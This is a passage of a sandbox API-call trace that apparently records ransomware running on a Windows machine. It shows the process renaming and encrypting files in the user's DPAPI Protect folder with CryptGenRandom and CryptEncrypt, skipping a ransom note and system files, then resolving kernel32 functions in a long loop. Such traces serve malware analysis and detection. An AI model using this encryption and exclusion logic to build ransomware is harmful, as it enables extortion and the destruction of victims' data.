(lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.351] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.351] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.351] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.351] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c") returned 147 [0078.351] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb") returned 155 [0078.351] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.WsWuyFb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.wswuyfb"), dwFlags=0x0) returned 1 [0078.352] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.352] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.352] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.353] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xf6409280, ftCreationTime.dwHighDateTime=0x1d4ae2c, ftLastAccessTime.dwLowDateTime=0xf6409280, ftLastAccessTime.dwHighDateTime=0x1d4ae2c, ftLastWriteTime.dwLowDateTime=0xf6409280, ftLastWriteTime.dwHighDateTime=0x1d4ae2c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="102a7bc8-3f85-4bb4-840a-38257d2965d2", cAlternateFileName="102A7B~1")) returned 1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="DECRYPT-FILES.txt") returned -1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="autorun.inf") returned -1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="boot.ini") returned -1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="desktop.ini") returned -1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="ntuser.dat") returned -1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="iconcache.db") returned -1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="bootsect.bak") returned -1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="ntuser.dat.log") returned -1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="thumbs.db") returned -1 [0078.353] lstrcmpiW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="Bootfont.bin") returned -1 [0078.353] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 111 [0078.353] lstrlenW (lpString="102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 36 [0078.353] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0078.353] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="102a7bc8-3f85-4bb4-840a-38257d2965d2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" [0078.353] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.353] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.354] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=468) returned 1 [0078.354] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.354] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.354] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.354] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.354] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.355] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.355] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.355] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.355] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.356] CloseHandle (hObject=0x45c) returned 1 [0078.356] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.356] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.357] CloseHandle (hObject=0x0) returned 0 [0078.357] CloseHandle (hObject=0x458) returned 1 [0078.357] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.357] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.358] GetTickCount () returned 0x114c16c [0078.358] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.358] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.358] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.358] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.358] lstrlenA (lpString="kernel32.dll") returned 12 [0078.359] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.359] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.359] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.359] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.359] lstrlenA (lpString="ADDATOMA") returned 8 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.359] lstrlenA (lpString="ADDATOMW") returned 8 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.359] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.359] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.359] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.359] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.359] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.359] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.359] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.359] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.359] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.359] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.359] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.360] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.360] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.360] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.360] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.360] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.360] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.360] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.360] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.360] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.360] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.360] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.360] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.360] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.360] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.360] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.360] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.360] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.361] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.361] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.361] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.361] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.361] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.361] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.361] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.361] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.361] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.361] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.361] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.361] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.361] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.361] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.361] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.361] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.361] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.361] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.362] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.362] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.362] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.362] lstrlenA (lpString="BEEP") returned 4 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.362] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.362] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.362] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.362] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.362] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.362] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.362] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.362] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.362] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.362] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.362] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.362] lstrlenA (lpString="CANCELIO") returned 8 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.362] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.362] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.362] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.363] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.363] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.363] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.363] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.363] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.363] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.363] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.363] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.363] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.363] lstrcpyA (in: lpString1=0x3f2ca78, 